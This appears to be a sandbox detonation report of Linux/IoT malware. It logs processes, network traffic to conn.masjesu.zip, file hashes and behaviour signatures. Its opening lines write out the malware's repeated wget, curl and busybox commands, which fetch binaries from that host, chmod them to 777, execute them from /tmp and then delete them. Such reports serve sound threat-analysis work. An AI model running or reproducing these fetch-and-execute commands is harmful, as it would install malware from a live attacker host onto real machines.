[/bin/busybox wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/chmod
[chmod 777 Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ
[./Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/rm
[rm Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/chmod
[chmod 777 lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3
[./lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/rm
[rm lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/chmod
[chmod 777 oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza
[./oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/rm
[rm oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/chmod
[chmod 777 Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg
[./Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/rm
[rm Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/chmod
[chmod 777 aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2
[./aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/rm
[rm aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/chmod
[chmod 777 eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5
[./eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/rm
[rm eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/chmod
[chmod 777 WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb
[./WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/rm
[rm WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/chmod
[chmod 777 f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8
[./f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/rm
[rm f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/chmod
[chmod 777 izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q
[./izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/rm
[rm izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/chmod
[chmod 777 fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL
[./fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/rm
[rm fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-21 01:58
Reported
2024-10-21 02:01
Platform
debian9-mipsel-20240611-en
Max time kernel
80s
Max time network
82s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg | /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg | N/A |
| N/A | /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 | /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 | N/A |
| N/A | /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 | /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 | N/A |
| N/A | /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb | /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb | N/A |
| N/A | /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 | /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 | N/A |
| N/A | /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q | /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q | N/A |
| N/A | /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL | /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL | N/A |
| N/A | /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz | /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz | N/A |
| N/A | /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 | /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 | N/A |
| N/A | /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q | /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q | N/A |
| N/A | /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh | /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh | N/A |
| N/A | /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ | /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ | N/A |
| N/A | /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 | /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 | N/A |
| N/A | /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza | /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza | N/A |
| N/A | /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz | /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz | N/A |
| N/A | /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 | /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 | N/A |
| N/A | /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q | /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q | N/A |
| N/A | /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh | /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh | N/A |
| N/A | /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ | /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ | N/A |
| N/A | /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 | /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 | N/A |
| N/A | /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza | /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza | N/A |
| N/A | /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg | /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg | N/A |
| N/A | /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 | /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 | N/A |
| N/A | /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 | /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 | N/A |
| N/A | /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb | /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb | N/A |
| N/A | /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 | /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 | N/A |
| N/A | /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q | /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q | N/A |
| N/A | /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL | /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
